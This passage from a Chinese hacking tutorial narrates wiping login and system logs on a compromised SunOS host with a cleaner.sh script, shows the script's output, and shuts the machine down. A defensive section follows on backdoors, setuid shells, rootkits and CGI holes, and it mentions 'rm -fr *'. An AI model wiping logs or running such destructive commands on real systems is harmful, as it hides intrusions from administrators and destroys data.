下面我们要"擦脚印"了，一般需要我们擦的日志有如下几个： lastlog、utmp（utmpx）、wtmp（wtmpx）、messages、syslog和sulog.你可以用vi手动删除，不过我"好心"告诉你，手动一条条地删太麻烦，这里我们使用一个perl写的脚本cleaner.sh,它可以帮我们把PP擦得干干净净 ^_^（这里略去如何将cleaner.sh用ftp传上来，并隐藏起来的步骤）：
    chmod x ./cleaner.sh
    #./cleaner.sh power
    Log cleaner v0.5b By: Tragedy/Dor OS
    detection…
    Detected SunOS
    Log cleaning in process…
    * Cleaning aculog （ 0 lines）…0 lines removed!
    * Cleaning lastlog （ 19789 lines）…45 lines removed!
    * Cleaning messages （ 12 lines）…1 lines removed!
    * Cleaning messages.0 （ 12 lines）…0 lines removed!
    * Cleaning messages.1 （ 28 lines）…0 lines removed!
    * Cleaning messages.2 （ 38 lines）…0 lines removed!
    * Cleaning messages.3 （ 17 lines）…0 lines removed!
    * Cleaning spellhist （ 0 lines）…0 lines removed!
    * Cleaning sulog （ 986 lines）…6 lines removed!
    * Cleaning utmp （ 179 lines）…1 lines removed!
    * Cleaning utmpx （ 387 lines）…1 lines removed!
    * Cleaning vold.log （ 0 lines）…0 lines removed!
    * Cleaning wtmp （ 299 lines）…0 lines removed!
    * Cleaning wtmpx （ 565 lines）…0 lines removed!
    * Cleaning authlog （ 0 lines）…0 lines removed!
    * Cleaning syslog （ 53 lines）…0 lines removed!
    * Cleaning syslog.0 （ 14 lines）…0 lines removed!
    * Cleaning syslog.1 （ 64 lines）…0 lines removed!
    * Cleaning syslog.2 （ 39 lines）…0 lines removed!
    * Cleaning syslog.3 （ 5 lines）…0 lines removed!
    * Cleaning syslog.4 （ 3 lines）…0 lines removed!
    * Cleaning syslog.5 （ 210 lines）…0 lines removed!
    # ./cleaner.sh root
    ……
    擦干净后再如法对root账户炮制一遍。最后……看了一下手表，哇！13:53了，又要上工了，：-（ 以后再来消遣你吧！^_^ 现在，我要上工，你就好好休息啰！嘿嘿！
    # /sbin/shutdown now
    ……
    关机啦！Wow!
    §。讨论及防范措施
    好了！我们从上面的例子可以看出，黑客的攻击步骤是如下六个步骤：
    1.收集资料
    2.取得普通用户的权限
    3.远程登陆
    4.取得超级用户的权限
    5.留下后门
    6.清除日志
    其中最重要，也是最容易被管理员忽视的是第二个步骤。如果能够得到一个那怕是权限再小的账户，黑客也可以利用各种五花八门的漏洞来提升他的权限，并最终获得root.许多人认为只要对root账户加以注意就足够了，其实不然，如果黑客很容易地进入了主机，那他就会跳过root口令这一攻击难点，直接利用缓冲区溢出来root（如上面的例子就是这样）。因此，大家一定要注意对普通账户密码强度的测试和检查，并强令用户定期更改。
    定期遍历磁盘检查。rhosts文件，这个后门十分危险，它可以直接不用口令而远程登陆。况且现在有不少的工具可以自动扫描这个漏洞，一旦发现一个，黑客们就会像苍蝇闻到血味一样蜂拥而至。如果他们像我一样的"善良",只玩个shutdown还好说；碰到个把"辣手"黑客来个rm -fr *,你的饭碗估计就会丢了！
    定期检查属性为-rwsr-sr--的文件。这种文件只要一被user执行，他马上就会具有和该文件创造者一样的权限。如果创造者是root的话，结果可想而之。一般黑客们都将shell改成此类属性然后藏起来，便于下次利用。
    不要过分相信日志，因为它很可能是被入侵者加过"工"的。注意留心某些启动时自动加载的文件的内容和时间，因为它们可能会被植入木马。如：/etc/rc.d/init.d/network,就是在网络服务启动时自动加载的。
    使用MD5保护自己的二进制程序。MD5在发现/bin、/sbin等目录下的文件被替换时会报警或用Email通知管理员，这可以有效地防止假login、假su的诱骗。
    使用getsniff和rootkit detector等工具查找系统中是否有嗅探器和rootkit黑客工具包，尤其是rootkit,这玩艺危害无穷。
    留心自己的CGI是否有漏洞，现在针对CGI漏洞的扫描工具特别多：如Unix/Linux平台下的messala和hunt等；Win9x/Win2000平台下的Twwwsacn和流光等等。尤其是流光，不论高手还是菜鸟都喜欢用它，真是一副老少皆宜的奇怪景观。^_^
    如果不需要ftp服务，最好关掉它，开着只会后患无穷。黑客可以先将rootkit、特制的su,已修改过属性的shell放在他自己的ftp服务器上，得到普通账户后直接上传到你的机器上并执行之，他就root了。简单吧？

    考试大温馨提示：本内容来源于网络，仅代表作者个人观点，与本站立场无关，仅供您学习交流使用。其中可能有部分文章经过多次转载而造成文章内容缺失、错误或文章作者不详等问题，请您谅解。如有侵犯您的权利，请联系我们，本站会立即予以处理。

    编辑特别推荐:

    linuxln命令详解

    nginx关于服务静态文件的配置

    使用expect实现ssh自动交互